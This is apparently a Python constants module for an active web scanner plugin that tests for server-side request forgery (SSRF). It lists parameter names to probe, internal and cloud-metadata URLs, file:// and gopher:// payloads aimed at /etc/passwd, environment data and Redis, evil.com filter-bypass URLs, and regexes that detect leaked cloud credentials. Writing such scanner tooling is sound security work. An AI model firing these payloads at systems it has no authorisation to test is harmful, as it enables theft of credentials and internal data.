"""Constants and patterns for SSRF out-of-band validation."""

import re

from src.analysis.plugins import AnalysisPluginSpec

__all__ = [
    "SSRF_OOB_VALIDATOR_SPEC",
    "SSRF_PARAM_NAMES",
    "INTERNAL_TARGETS",
    "PROTOCOL_PAYLOADS",
    "ENCODING_BYPASSES",
    "CLOUD_METADATA_PATTERNS",
    "INTERNAL_LEAK_PATTERNS",
    "INTERNAL_ERROR_PATTERNS",
    "DNS_CALLBACK_RE",
]

SSRF_OOB_VALIDATOR_SPEC = AnalysisPluginSpec(
    key="ssrf_oob_validator",
    label="SSRF Out-of-Band Validator",
    description="Actively test URL parameters with internal and collaborator-style payloads for SSRF vulnerabilities.",
    group="active",
    slug="ssrf_oob_validator",
    enabled_by_default=True,
)

SSRF_PARAM_NAMES = {
    "url",
    "uri",
    "path",
    "dest",
    "destination",
    "redirect",
    "next",
    "continue",
    "continue_to",
    "target",
    "callback",
    "webhook",
    "fetch",
    "load",
    "open",
    "proxy",
    "request",
    "download",
    "import",
    "file",
    "src",
    "source",
    "domain",
    "host",
    "port",
    "server",
    "service",
    "endpoint",
    "api_url",
    "api_endpoint",
    "image",
    "img",
    "avatar",
    "photo",
    "video",
    "audio",
    "file_url",
    "document",
    "pdf",
    "attachment",
    "preview",
    "view",
    "page",
    "link",
    "forward",
    "return_to",
    "returnto",
    "go",
    "out",
    "reference",
    "site",
    "window",
    "to",
    "val",
    "data",
    "reference",
    "navigation",
    "redirect_uri",
    "redirect_url",
    "return_url",
    "checkout_url",
    "image_url",
    "image_src",
    "logo",
    "background",
    "media",
    "content",
    "load_url",
    "fetch_url",
    "proxy_url",
    "remote",
    "external",
    "ref",
    "target_url",
    "source_url",
    "target_host",
    "target_port",
    "connect",
    "access",
    "dir",
    "show",
    "navigation",
    "validate",
    "verify",
    "read",
}

INTERNAL_TARGETS = [
    "http://127.0.0.1",
    "http://localhost",
    "http://0.0.0.0",
    "http://169.254.169.254",
    "http://100.100.100.200",
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://metadata.google.internal/computeMetadata/v1/",
    "http://168.63.129.16",
    "http://[::1]",
    "http://2130706433",
    "http://127.0.0.1:8080",
    "http://127.0.0.1:443",
    "http://127.0.0.1:6379",
    "http://127.0.0.1:27017",
    "http://127.0.0.1:9200",
    "http://127.0.0.1:11211",
    "http://10.0.0.1",
    "http://192.168.1.1",
    "http://172.16.0.1",
]

PROTOCOL_PAYLOADS = [
    "file:///etc/passwd",
    "file:///etc/hosts",
    "file:///proc/self/environ",
    "gopher://127.0.0.1:6379/",
    "dict://127.0.0.1:11211/",
    "ftp://127.0.0.1/",
    "tftp://127.0.0.1/",
    "ldap://127.0.0.1/",
    "sftp://127.0.0.1/",
    "ssh://127.0.0.1/",
]

ENCODING_BYPASSES = [
    "http://127.0.0.1%23@evil.com",
    "http://evil.com%23@127.0.0.1/",
    "http://127.0.0.1%00@evil.com",
    "http://127.0.0.1%2523@evil.com",
    "http://127.1/",
    "http://0177.0.0.1/",
    "http://0x7f.0.0.1/",
    "http://0x7f000001",
    "http://127.0.0.1.nip.io",
    "http://localtest.me",
    "http://localtest.host",
    "http://vcap.me",
    "http://burpcollaborator.local",
]

CLOUD_METADATA_PATTERNS = [
    re.compile(r"ami-id", re.IGNORECASE),
    re.compile(r"instance-id", re.IGNORECASE),
    re.compile(r"instance-type", re.IGNORECASE),
    re.compile(r"local-ipv4", re.IGNORECASE),
    re.compile(r"public-ipv4", re.IGNORECASE),
    re.compile(r"iam/security-credentials", re.IGNORECASE),
    re.compile(r"accessKeyId", re.IGNORECASE),
    re.compile(r"secretAccessKey", re.IGNORECASE),
    re.compile(r"Token.*:.*[A-Za-z0-9/+=]{20,}", re.IGNORECASE),
    re.compile(r"computeMetadata", re.IGNORECASE),
    re.compile(r"gcp-.*-token", re.IGNORECASE),
    re.compile(r"Azure.*Instance.*Metadata", re.IGNORECASE),
    re.compile(r"SubscriptionId", re.IGNORECASE),
]

INTERNAL_LEAK_PATTERNS = [
    re.compile(r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3})\b"),
    re.compile(r"\b(?:172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3})\b"),
    re.compile(r"\b(?:192\.168\.\d{1,3}\.\d{1,3})\b"),
    re.compile(r"\b(?:127\.\d{1,3}\.\d{1,3}\.\d{1,3})\b"),
    re.compile(r"\b(?:169\.254\.\d{1,3}\.\d{1,3})\b"),
    re.compile(r"\blocalhost\b", re.IGNORECASE),
    re.compile(r"\binternal\b.*\b(?:server|host|ip|address|endpoint)\b", re.IGNORECASE),
    re.compile(r"\bprivate\b.*\b(?:network|ip|range|subnet)\b", re.IGNORECASE),
    re.compile(r"\b(?:ec2|compute|metadata|instance)\b.*\b(?:internal|local)\b", re.IGNORECASE),
]

INTERNAL_ERROR_PATTERNS = [
    re.compile(r"connection\s+refused.*(?:127\.0\.0\.1|localhost|internal)", re.IGNORECASE),
    re.compile(r"failed\s+to\s+connect\s+to\s+(?:internal|local|private)", re.IGNORECASE),
    re.compile(r"access\s+denied.*(?:internal|metadata|169\.254)", re.IGNORECASE),
    re.compile(r"SSRF|server.?side.?request", re.IGNORECASE),
    re.compile(r"blocked.*(?:internal|private|local)\s+(?:address|ip|host)", re.IGNORECASE),
    re.compile(r"ECONNREFUSED", re.IGNORECASE),
    re.compile(r"ENOTFOUND.*(?:internal|local)", re.IGNORECASE),
    re.compile(r"getaddrinfo.*failed", re.IGNORECASE),
    re.compile(r"no\s+route\s+to\s+host", re.IGNORECASE),
    re.compile(r"network\s+unreachable", re.IGNORECASE),
]

DNS_CALLBACK_RE = re.compile(
    r"[a-z0-9.-]+\.burpcollaborator\.net|[a-z0-9.-]+\.oastify\.com|[a-z0-9.-]+\.interact\.sh|[a-z0-9.-]+\.requestbin\.net",
    re.IGNORECASE,
)
